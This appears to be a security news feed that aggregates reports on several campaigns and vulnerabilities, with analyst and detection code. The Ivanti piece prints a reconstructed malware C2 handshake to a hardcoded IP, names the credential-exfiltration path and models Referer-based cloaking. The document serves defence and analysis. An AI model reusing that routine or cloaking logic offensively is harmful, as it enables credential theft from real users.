• Cybersecurity researchers have disclosed details of a new campaign that exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems. The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple


  • An aggressive SEO poisoning campaign has surfaced in early October 2025, preying on users searching for the legitimate Ivanti Pulse Secure VPN client.

    Attackers have registered lookalike domains such as ivanti-pulsesecure.com and ivanti-secure-access.org to host trojanized installers that appear official.

    Unsuspecting victims clicking on top search results are redirected to these malicious sites, where a signed MSI file is offered for download under the guise of Ivanti’s Secure Access Client.

    The trojanized installer carries a credential-stealing DLL, designed to harvest saved VPN connection details and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.

    Example of Bing search results with a poisoned website (Source – Zscaler)

    Zscaler researchers noted a sophisticated referrer-based content delivery tactic used by the phishing domains. When accessed directly in a browser, the sites display benign content without any download links, evading quick detection by analysts and security scanners.

    Only users arriving via search engine referrals—particularly from Bing—are shown the malicious download button; the pages inspect the HTTP Referer header and use it to cloak their true intent from anyone who did not arrive through a search result.
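    The check a responder would run against a suspect domain, written here as an added example (not Zscaler's code and not anything recovered from the actor's servers): the server side is a constructed model of the Referer-gated behaviour described above, and the probe fetches the page twice, once bare and once with a Bing search Referer, then reports whether download links appear only on the referred visit. The fetch callable, the search-engine host list and the link pattern are assumptions for the example.

```python
import re
from urllib.parse import urlparse

# Search-engine hosts whose referrals trigger the malicious variant of the page.
# Constructed for this example; the campaign is described as keying on Bing in particular.
SEARCH_ENGINE_HOSTS = {"www.bing.com", "bing.com", "www.google.com", "google.com", "duckduckgo.com"}

# href targets that end in an installer-style extension.
DOWNLOAD_LINK_RE = re.compile(r'href="([^"]+\.(?:msi|exe|zip))"', re.IGNORECASE)


def cloaked_page(request_headers: dict) -> str:
    """Model of the Referer-gated page described for the phishing domains.

    Constructed stand-in for the attacker's server logic, not code recovered from it:
    a direct visit gets a benign page, a search-engine referral gets the download link.
    """
    referer = request_headers.get("Referer", "")
    host = (urlparse(referer).hostname or "").lower()
    if host in SEARCH_ENGINE_HOSTS:
        return ('<html><body><h1>Ivanti Secure Access Client</h1>'
                '<a class="btn" href="/downloads/SecureAccessClient.msi">Download</a>'
                '</body></html>')
    return '<html><body><h1>Ivanti Secure Access Client</h1><p>Documentation</p></body></html>'


def differential_probe(fetch, url: str) -> dict:
    """Fetch a suspect page bare and with a Bing search Referer, then compare the two.

    `fetch(url, headers) -> str` is supplied by the caller so the probe runs offline here;
    in the field it would wrap urllib.request with the same headers.
    """
    bare = fetch(url, {})
    referred = fetch(url, {
        "Referer": "https://www.bing.com/search?q=ivanti+pulse+secure+vpn+client",
    })
    bare_links = set(DOWNLOAD_LINK_RE.findall(bare))
    referred_links = set(DOWNLOAD_LINK_RE.findall(referred))
    return {
        "cloaked": bare != referred,
        "referred_only_downloads": sorted(referred_links - bare_links),
    }


def offline_fetch(url: str, headers: dict) -> str:
    """Stand-in transport that routes the probe to the modelled page (no network)."""
    return cloaked_page(headers)


if __name__ == "__main__":
    print(differential_probe(offline_fetch, "https://ivanti-pulsesecure.com/"))
```

    A bare fetch that comes back clean does not clear a domain on its own: kits of this kind may also key on User-Agent, Accept-Language or client geolocation, so vary those too when the first differential shows nothing.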

    Once downloaded, the MSI installer drops two malicious DLLs—dwmapi.dll and pulseextension.dll—signed with a certificate issued by a legitimate certificate authority to further bypass security controls.

    The threat actor’s fake Ivanti Pulse Secure download website (Source – Zscaler)

    These DLLs embed a sequence of routines to locate and parse the Ivanti connection store (connectionstore.dat), extracting saved URIs and credentials.

    Delving into the infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a network handshake with a hardcoded IP address in the Azure range (4.239.95.1) on port 8080.

    The following C code snippet illustrates the socket setup and data exchange routine (reconstructed from the disassembly; the headers, buffer declarations and wrapping function the published fragment omitted are added here so it reads as complete code):-

    #include <winsock2.h>
    #include <ws2tcpip.h>

    static unsigned char buf[0x34];   /* receive buffer, reused for the 52-byte reply */
    static unsigned char key[0x30];   /* XOR key; where it comes from is not shown in the fragment */

    static void c2_handshake(void)    /* function name added for readability */
    {
        WSADATA wsa;
        WSAStartup(MAKEWORD(2,2), &wsa);
        SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
        struct sockaddr_in addr = {0};
        addr.sin_family = AF_INET;
        addr.sin_port   = htons(8080);
        inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr);
        connect(sock, (struct sockaddr*)&addr, sizeof(addr));
        // Receive 48 bytes from the C2
        recv(sock, (char*)buf, 0x30, 0);
        // XOR deobfuscation of the received block
        for(int i=0;i<0x30;i++) buf[i]^=key[i];
        // Send 52-byte obfuscated payload (how bytes 0x30-0x33 are filled is not shown)
        send(sock, (char*)buf, 0x34, 0);
    }

    Reverse-engineered code showing network communication logic (Source – Zscaler)

    After the initial handshake and the XOR deobfuscation routine, the malware transmits the stolen VPN credentials in an HTTP POST request to the path /incomeshit.

    Because the IP resides within Microsoft Azure’s range, security teams may overlook these connections as benign cloud traffic.

    By masquerading as trusted software and incorporating advanced evasion techniques, this campaign demonstrates the potency of search engine poisoning as an initial access vector.

    Organizations should verify Ivanti installer hashes against the values published by the vendor, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate users on verifying official download sources.
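    The monitoring recommendation above, worked through as an added example rather than code from the report: the block runs two detections over constructed Zeek-style conn.log and http.log rows, flagging internal hosts that open TCP/8080 to Azure address space (scored high when the byte counts match the 48-byte receive / 52-byte send handshake described earlier) and the POST to /incomeshit. The Azure CIDRs, the column layout and the sample rows are assumptions made here; the only values taken from the report are the IP address, the port, the byte sizes and the path.

```python
import ipaddress

# Stand-in for the AzureCloud prefixes in Microsoft's Service Tags JSON. These CIDRs are
# assumed for this example (the report's 4.239.95.1 falls in the first); in production load
# the published file rather than hard-coding ranges.
AZURE_PREFIXES = [ipaddress.ip_network(c) for c in ("4.224.0.0/12", "20.33.0.0/16", "40.74.0.0/15")]
INTERNAL_PREFIXES = [ipaddress.ip_network(c) for c in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Column order of the constructed Zeek-style records below (a subset of conn.log / http.log).
CONN_FIELDS = ("ts", "orig_h", "orig_p", "resp_h", "resp_p", "proto", "orig_bytes", "resp_bytes")
HTTP_FIELDS = ("ts", "orig_h", "resp_h", "method", "host", "uri")

# Constructed sample records, not real traffic. 4.239.95.1:8080 and /incomeshit are the
# indicators from the report; the other external addresses are documentation ranges.
SAMPLE_CONN_LOG = """\
1760000000.101\t10.0.0.5\t51000\t4.239.95.1\t8080\ttcp\t52\t48
1760000000.202\t10.0.0.5\t51001\t4.239.95.2\t443\ttcp\t1400\t9200
1760000000.303\t10.0.0.7\t51002\t203.0.113.10\t8080\ttcp\t300\t300
1760000000.404\t10.0.0.9\t51003\t20.33.7.7\t8080\ttcp\t5000\t5000
"""
SAMPLE_HTTP_LOG = """\
1760000001.001\t10.0.0.5\t4.239.95.1\tPOST\t4.239.95.1\t/incomeshit
1760000002.002\t10.0.0.9\t198.51.100.20\tGET\twww.example.com\t/index.html
"""


def _in_any(ip_text: str, prefixes) -> bool:
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in prefixes)


def parse_records(text: str, fields: tuple) -> list[dict]:
    """Split tab-separated lines into dicts; skip comments and malformed rows instead of crashing."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) == len(fields):
            records.append(dict(zip(fields, parts)))
    return records


def detect_azure_8080(conn_text: str) -> list[dict]:
    """Flag internal hosts opening TCP/8080 to Azure space.

    The reported handshake is a fixed 48-byte receive followed by a 52-byte send, so a
    connection whose byte counts match exactly is scored high; any other 8080-to-Azure
    flow is reported at low confidence for triage.
    """
    alerts = []
    for r in parse_records(conn_text, CONN_FIELDS):
        if r["proto"] != "tcp" or r["resp_p"] != "8080":
            continue
        if not (_in_any(r["orig_h"], INTERNAL_PREFIXES) and _in_any(r["resp_h"], AZURE_PREFIXES)):
            continue
        exact = r["orig_bytes"] == "52" and r["resp_bytes"] == "48"
        alerts.append({"ts": r["ts"], "src": r["orig_h"], "dst": r["resp_h"],
                       "confidence": "high" if exact else "low"})
    return alerts


def detect_exfil_post(http_text: str) -> list[dict]:
    """Flag the credential upload: an HTTP POST to the /incomeshit path."""
    return [{"ts": r["ts"], "src": r["orig_h"], "dst": r["resp_h"]}
            for r in parse_records(http_text, HTTP_FIELDS)
            if r["method"] == "POST" and r["uri"] == "/incomeshit"]


if __name__ == "__main__":
    for alert in detect_azure_8080(SAMPLE_CONN_LOG) + detect_exfil_post(SAMPLE_HTTP_LOG):
        print(alert)
```

    The byte-count match is what separates this tradecraft from ordinary developer traffic to port 8080; treat the low-confidence hits as a hunting list to enrich with the destination's Azure service tag and the originating process, not as alerts in their own right.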

    Continuous threat hunting for referrer-based anomalies remains essential to thwarting these stealthy attacks.


    The post Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware appeared first on Cyber Security News.


  • Qilin ransomware–an increasingly prolific ransomware-as-a-service (RaaS) operation–has intensified its global extortion campaigns by exploiting a covert network of bulletproof hosting (BPH) providers. These rogue hosting services, often headquartered in secrecy-friendly jurisdictions and operated through labyrinthine shell-company structures, allow Qilin’s operators and affiliates to host malware, data leak sites, and command-and-control infrastructure with near impunity. In […]

    The post Qilin Ransomware Leverages Ghost Bulletproof Hosting for Global Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A newly disclosed vulnerability in Samba’s WINS server hook script enables unauthenticated attackers to run arbitrary commands on affected domain controllers. This critical flaw, tracked as CVE-2025-10230, carries a maximum CVSSv3.1 score of 10.0, reflecting its ease of exploitation and devastating impact on confidentiality, integrity, and availability. Overview of the Vulnerability The issue arises when […]

    The post Critical Samba Flaw Allows Remote Attackers to Execute Arbitrary Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • The UK’s Information Commissioner’s Office (ICO) has imposed a £14 million fine on outsourcing giant Capita following a major cyber attack in 2023 that exposed the personal data of 6.6 million individuals.

    This penalty, split as £8 million to Capita plc and £6 million to Capita Pension Solutions Limited, marks one of the largest data protection fines in recent UK history.

    The breach highlighted critical shortcomings in corporate cybersecurity, affecting pension schemes and sensitive personal information across hundreds of organizations.

    The incident unfolded on March 22, 2023, when an employee unwittingly downloaded a malicious file onto a company device, granting hackers initial access to Capita’s network.

    Despite a high-priority security alert triggering within 10 minutes and some automated responses activating, Capita failed to isolate the infected device for 58 hours, far exceeding their one-hour target response time.

    This delay allowed the attackers to deploy malware, escalate privileges, and move laterally across systems, exfiltrating nearly one terabyte of data between March 29 and 30.

    By March 31, ransomware was deployed, resetting user passwords and locking Capita staff out of their systems, which disrupted services for clients, including local councils, the NHS, and pension providers.

    Capita Data Breach Exposes Sensitive Data

    The stolen data encompassed pension records, staff details, and customer information from over 600 organizations, with 325 pension schemes directly impacted.

    Sensitive elements included financial data, criminal records, and special category information such as health or ethnic details for some victims.

    The ICO received at least 93 complaints from affected individuals reporting anxiety and stress over potential identity theft and fraud.

    The ICO’s probe uncovered multiple failures in Capita’s data protection practices, violating UK GDPR requirements for secure processing.

    Notably, Capita lacked a tiered administrative account model, which made privilege escalation and lateral movement across the network easy; these weaknesses had been flagged in prior assessments but were never addressed.

    Their Security Operations Centre was chronically understaffed, consistently missing response targets for alerts in the months leading up to the attack.

    Additionally, critical systems handling millions of records underwent penetration testing only at commissioning, with no follow-ups, and findings remained siloed within business units rather than organization-wide.

    These lapses left vast amounts of personal data exposed to significant risk, amplifying the breach’s scale.

    Information Commissioner John Edwards emphasized that “Capita failed in its duty to protect the data entrusted to it by millions of people,” underscoring the preventable nature of the incident through basic measures like the principle of least privilege and timely alert responses.

    Originally facing a £45 million provisional fine, Capita negotiated it down to £14 million via a voluntary settlement, admitting liability without appeal.

    Capita offered 12 months of free credit monitoring to affected individuals through Experian, with over 260,000 activations, and established a dedicated support hotline.

    CEO Adolfo Hernandez acknowledged the event as part of a wave of attacks on UK firms, reaffirming commitments to data security for public and private sector clients.

    The ICO urged organizations to follow NCSC guidance on preventing lateral movement, conduct regular risk assessments, and prioritize security staffing.

    With ongoing legal actions from victims, Capita’s total costs may yet rise, emphasizing accountability in an era of escalating ransomware threats.


    The post Capita To pay £14 Million For Data Breach Exposes 6.6 Million Users Personal Data appeared first on Cyber Security News.


  • Penetration testing helps organizations ensure IT systems are secure, but it should never be treated in a one-size-fits-all approach. Traditional approaches can be rigid and cost your organization time and money – while producing inferior results.  The benefits of pen testing are clear. By empowering “white hat” hackers to attempt to breach your system using similar tools and techniques to


  • The UK’s Information Commissioner’s Office has imposed a £14 million penalty on Capita following a major cyber attack in March 2023 that exposed the personal information of 6.6 million people. The fine was split between Capita plc, which received £8 million, and its subsidiary Capita Pension Solutions Limited, which was fined £6 million. The breach […]

    The post Capita Fined £14 Million After Data Breach Exposes 6.6 Million Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • In a recently uncovered campaign, the Mysterious Elephant advanced persistent threat (APT) group has executed a sophisticated series of intrusions against government and foreign policy agencies across the Asia-Pacific region. The latest operations, active since early 2025, rely on custom-built malware modules and modified open-source utilities to target and siphon off documents, images, and archives […]

    The post Mysterious Elephant APT Breach: Hackers Infiltrate Organization to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Since its public debut in October 2025, nightMARE has quickly become a vital tool for malware analysts seeking to streamline static and dynamic analysis workflows.

    Developed by Elastic Security Labs, nightMARE brings together mature open-source reverse engineering components under a unified Python API.

    Rather than forcing users to juggle disparate dependencies, nightMARE leverages Rizin via rz-pipe for disassembly and the Unicorn engine for lightweight emulation.

    This cohesive design lets researchers rapidly craft configuration extractors, carve IoCs, and automate recurring analysis tasks.

    Emerging from a need to reduce code duplication across Elastic's internal tooling, nightMARE builds on practices honed over thousands of sample analyses.

    Elastic analysts noted that many proprietary scripts suffered from fragile dependency chains and inconsistent abstractions.

    By encapsulating common patterns—such as pattern matching, instruction emulation, and cross-reference enumeration—within a robust library, nightMARE provides a stable foundation for both seasoned and novice reverse engineers.

    Upon installation, nightMARE exposes three main modules: analysis, core, and malware. The analysis module integrates Rizin to enable disassembly, hex-pattern searches, and function enumeration.

    The core module offers utilities for bitwise operations, regex-based extraction, and data casting.

    Finally, the malware module groups family-specific extractors—ranging from Smokeloader to LUMMA—into versioned sub-packages that demonstrate real-world uses of the API.

    Elastic researchers identified a significant spike in LUMMA stealer campaigns in mid-2025, underscoring the value of rapid configuration extraction.

    Through nightMARE's emulation capabilities, analysts can instantiate a WindowsEmulator, register Import Address Table (IAT) hooks on APIs such as Sleep, and execute targeted code sequences in seconds.

    By intercepting decryption routines in-process, nightMARE automates the recovery of C2 domains without manual unpacking or debugger-driven tracing.

    Infection Mechanism and Emulation-Driven Extraction

    nightMARE’s emulation framework offers a lightweight alternative to full-scale sandboxing. Consider the common technique where malware invokes Sleep before proceeding to C2 decryption.

    The following code snippet demonstrates how nightMARE's WindowsEmulator hooks Sleep in a LUMMA sample, capturing timing behavior and enabling uninterrupted emulation (the missing unicorn import and the entry-point call are added here):-

    import pathlib

    import unicorn
    from nightMARE.analysis import emulation


    def sleep_hook(emu: emulation.WindowsEmulator, args):
        # Sleep(DWORD dwMilliseconds): the argument travels in RCX under the x64 calling
        # convention; ECX holds the low 32 bits, which is all the DWORD needs.
        print(f"Sleep {emu.unicorn.reg_read(unicorn.x86_const.UC_X86_REG_ECX)} ms")
        # Skip the real delay and return to the caller immediately.
        emu.do_return()


    def main():
        path = pathlib.Path(r"C:\samples\DismHost.exe")
        emu = emulation.WindowsEmulator(is_32bits=False)
        emu.load_pe(path.read_bytes(), stack_size=0x10000)
        emu.enable_iat_hooking()
        emu.set_iat_hook(b"KERNEL32.dll!Sleep", sleep_hook)
        # Emulate only the code range of interest in the sample.
        emu.unicorn.emu_start(0x140006404, 0x140006412)


    if __name__ == "__main__":
        main()

    LUMMA manually pushes Steam profile data for decryption (Source – Elastic)

    By intercepting the Sleep call, the emulator advances past timing obfuscation and resumes execution at the next instruction.

    Combined with emu.get_data() and emu.get_xrefs_from(), analysts locate the addresses of the decryption key and nonce, allocate memory buffers, and invoke the malware's own ChaCha20 routine directly.

    Ultimately, nightMARE outputs a decrypted list of C2 domains, ready for threat intelligence ingestion.

    With version 0.16, Elastic Security Labs continues to expand nightMARE’s repertoire, adding emulation support for additional API hooks, enhancing pattern-matching accuracy, and refining malware module templates.

    As emerging threats exploit novel obfuscation and packing schemes, nightMARE stands poised to accelerate analysis pipelines and empower the community’s collective defense.


    The post New nightMARE Python Library to Analyze Malware and Extract Intelligence Indicators appeared first on Cyber Security News.


  • The Apache Software Foundation has disclosed a critical vulnerability in its ActiveMQ NMS AMQP Client that could allow attackers to execute arbitrary code on vulnerable systems.

    Tracked as CVE-2025-54539, this deserialization flaw poses a serious risk to applications relying on the client for messaging over AMQP protocols.

    The issue was publicly detailed in an advisory on October 15, 2025, urging immediate upgrades to mitigate potential exploits.

    The vulnerability stems from improper handling of untrusted data received from AMQP servers. Specifically, in versions up to and including 2.3.0, the client deserializes server-supplied data without adequately restricting which types may be instantiated, and a malicious server can abuse this.

    By crafting specially designed responses, attackers could trigger remote code execution on the client side, potentially compromising entire networks or applications.

    Deserialization of untrusted data has long been a vector for sophisticated attacks, because it bypasses typical input validation and directly manipulates object state in memory.

    Apache ActiveMQ Vulnerability

    Efforts to secure the client weren’t foolproof. Starting with version 2.1.0, Apache introduced allow and deny lists to restrict deserialization, aiming to limit what classes could be instantiated from incoming data.

    However, security researchers at Endor Labs discovered that these controls could be circumvented under specific conditions, such as through cleverly nested objects or alternative serialization paths.

    This bypass effectively nullified the protection, leaving users exposed to the full scope of the flaw. The discovery highlights the challenges in securing legacy serialization mechanisms, especially in .NET environments where binary formats have been a staple.

    As .NET 9 deprecates binary serialization (a move by Microsoft to curb similar risks), Apache is now weighing the complete removal of this support from the NMS API in upcoming releases.

    This shift aligns with broader industry trends toward safer alternatives like JSON or Protocol Buffers, reducing the attack surface for deserialization-based exploits.

    Mitigations

    To address CVE-2025-54539, Apache recommends upgrading to version 2.4.0 or later, where the deserialization logic has been fortified against these attacks.

    For projects still tied to .NET binary serialization, migrating to modern formats is essential as a hardening measure.

    Organizations using ActiveMQ in distributed systems, such as financial services or IoT infrastructures, should prioritize patching to prevent lateral movement by threat actors.

    Discovered by Endor Labs’ Security Research Team, this vulnerability underscores the need for vigilant third-party dependency management.

    Apache rates the issue as important severity; unpatched instances could invite ransomware deployment or data exfiltration.

    Developers are advised to scan their supply chains and test connections to external AMQP brokers, ensuring no untrusted endpoints can influence client behavior.
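    The supply-chain scan the advisory calls for, as an added example (not Apache's or Endor Labs' code): it walks SDK-style .csproj files and legacy packages.config files for the client package and reports every reference that can resolve below the fixed 2.4.0 release, including version ranges (checked at their lower bound) and pre-release versions. The project files are constructed for the example; the NuGet package ID Apache.NMS.AMQP is assumed to be the client's published ID.

```python
import re
import xml.etree.ElementTree as ET

# NuGet package ID of the client (assumed) and the fixed version from the advisory.
PACKAGE_ID = "Apache.NMS.AMQP"
FIXED_VERSION = "2.4.0"

# Constructed project files for this example; none is a real repository.
SAMPLE_PROJECTS = {
    "src/Billing/Billing.csproj": """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Apache.NMS.AMQP" Version="2.3.0" />
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
  </ItemGroup>
</Project>""",
    "src/Telemetry/Telemetry.csproj": """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="apache.nms.amqp">
      <Version>2.4.0</Version>
    </PackageReference>
  </ItemGroup>
</Project>""",
    "src/Preview/Preview.csproj": """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Apache.NMS.AMQP" Version="[2.2.0,3.0.0)" />
  </ItemGroup>
</Project>""",
    "src/Legacy/packages.config": """<packages>
  <package id="Apache.NMS.AMQP" version="2.1.0" targetFramework="net48" />
</packages>""",
}


def parse_version(spec: str) -> tuple:
    """Turn a NuGet version or range into a comparable tuple.

    For a range such as "[2.2.0,3.0.0)" the lower bound is what a restore may resolve to,
    so that is what gets checked. A pre-release (2.4.0-beta1) sorts before its release,
    so it is still treated as unpatched.
    """
    m = re.match(r"^[\[\(]?\s*([0-9][0-9.]*)(-[0-9A-Za-z.-]+)?", spec.strip())
    if not m:
        raise ValueError(f"unparseable version: {spec!r}")
    nums = [int(p) for p in m.group(1).strip(".").split(".")]
    nums += [0] * (3 - len(nums))
    return tuple(nums[:3]) + (0 if m.group(2) else 1,)


def _local(tag: str) -> str:
    """Strip an XML namespace (old-style .csproj files carry one) so tag names compare cleanly."""
    return tag.rsplit("}", 1)[-1]


def package_references(xml_text: str) -> list[tuple[str, str]]:
    """Return (package id, version spec) pairs from an SDK-style .csproj or a legacy packages.config."""
    refs = []
    for node in ET.fromstring(xml_text).iter():
        name = _local(node.tag)
        if name == "PackageReference":
            pkg = node.get("Include") or node.get("Update")
            version = node.get("Version")
            if version is None:  # <Version> may be a child element instead of an attribute
                child = next((c for c in node if _local(c.tag) == "Version"), None)
                version = child.text if child is not None else None
        elif name == "package":
            pkg, version = node.get("id"), node.get("version")
        else:
            continue
        if pkg and version:
            refs.append((pkg, version.strip()))
    return refs


def find_vulnerable(projects: dict) -> list[dict]:
    """Report every reference to the client package that resolves below the fixed version."""
    fixed = parse_version(FIXED_VERSION)
    findings = []
    for path, xml_text in projects.items():
        for pkg, spec in package_references(xml_text):
            if pkg.lower() != PACKAGE_ID.lower():  # NuGet IDs are case-insensitive
                continue
            if parse_version(spec) < fixed:
                findings.append({"file": path, "version": spec, "fixed": FIXED_VERSION})
    return findings


if __name__ == "__main__":
    for finding in find_vulnerable(SAMPLE_PROJECTS):
        print(finding)
```

    Project files only show direct references; a lock file or `dotnet list package --include-transitive` is needed to catch the client pulled in through another package, which this scan would miss.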


    The post Critical Apache ActiveMQ Vulnerability Let Attackers Execute Arbitrary Code appeared first on Cyber Security News.
